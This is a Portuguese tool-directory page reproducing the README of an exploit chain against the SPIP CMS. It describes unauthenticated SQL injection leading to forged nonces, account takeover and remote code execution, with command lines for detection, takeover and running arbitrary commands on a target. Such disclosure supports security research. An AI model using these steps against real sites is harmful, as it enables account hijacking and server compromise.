Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
spip-exploits — Cadeia de exploits em Python para as CVEs 2026-72708/72709/72710 do SPIP, encadeando injeção SQL não autenticada até tomada de conta e execução remota de código. | Kitploit
Ferramentas/GitHubGitHub/ambionics/spip-exploits
Frameworks de ExploraçãoAnálise de VulnerabilidadesExploraçãoExploração de Aplicações WebSegurança WebTestes de PenetraçãoPapers e Pesquisa
GitHubambionics/spip-exploits

spip-exploits

Cadeia de exploits em Python para as CVEs 2026-72708/72709/72710 do SPIP, encadeando injeção SQL não autenticada até tomada de conta e execução remota de código.

Ver Repositório
1há 1 diaAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

Casse-Spip (CVE-2026-72708, CVE-2026-72709, CVE-2026-72710)

De uma Injeção SQL Não Autenticada ao Remote Code Execution

Exploit para CVE-2026-72708, CVE-2026-72709 e CVE-2026-72710 descoberto por Franck Chevalier (Wayko)

Para uma análise técnica completa e aprofundada, leia o artigo completo no blog da Lexfo.

Aviso Legal

Este repositório é fornecido apenas para fins de pesquisa e segurança defensiva. O autor não assume qualquer responsabilidade pelo uso indevido destas informações.


Visão Geral

O ponto de entrada é uma injeção SQL na página pública sitemap.xml para vazar alea_ephemere.

Com esse segredo, nonces válidos podem ser forjados para ações anônimas.

A partir daí, duas ações levam ao RCE:

  • action=editer_auteur tomada de conta, depois RCE a partir da área privada.
  • action=editer_objet mass assignment, para escrever uma linha na fila spip_jobs, depois executá-la através de action=cron.

Exploração

Configuração

root@kitploit:~
python3 -m venv .venv
.venv/bin/pip install -r requirements.txt
.venv/bin/python3 casse-spip.py --help

Detectar

root@kitploit:~
.venv/bin/python3 casse-spip.py -t http://127.0.0.1:8000

Cadeia completa 1 : Tomada de Conta (CVE-2026-72708 > CVE-2026-72709)

root@kitploit:~
.venv/bin/python3 casse-spip.py -t http://127.0.0.1:8000 --ato -i 1 -p "Casse-Spip!2026"

Antes de sobrescrever, --ato extrai o login do alvo e o hash pass atual (através da SQLi) para que você possa restaurá-lo depois com --restore-hash:

root@kitploit:~
.venv/bin/python3 casse-spip.py -t http://127.0.0.1:8000 --restore-hash '$2y$12$...' -i 1

Cadeia completa 2 : RCE (CVE-2026-72708 > CVE-2026-72709 > CVE-2026-72710)

root@kitploit:~
.venv/bin/python3 casse-spip.py -t http://127.0.0.1:8000 --exploit -c "id"

O arquivo será escrito em IMG/casse-spip_<token>.html.


Referências

  • Post no blog - Análise técnica aprofundada
  • Vulncheck - Detalhes da Vulnerabilidade
  • CVE-2026-72708
  • CVE-2026-72709
  • CVE-2026-72710
Baixar ferramenta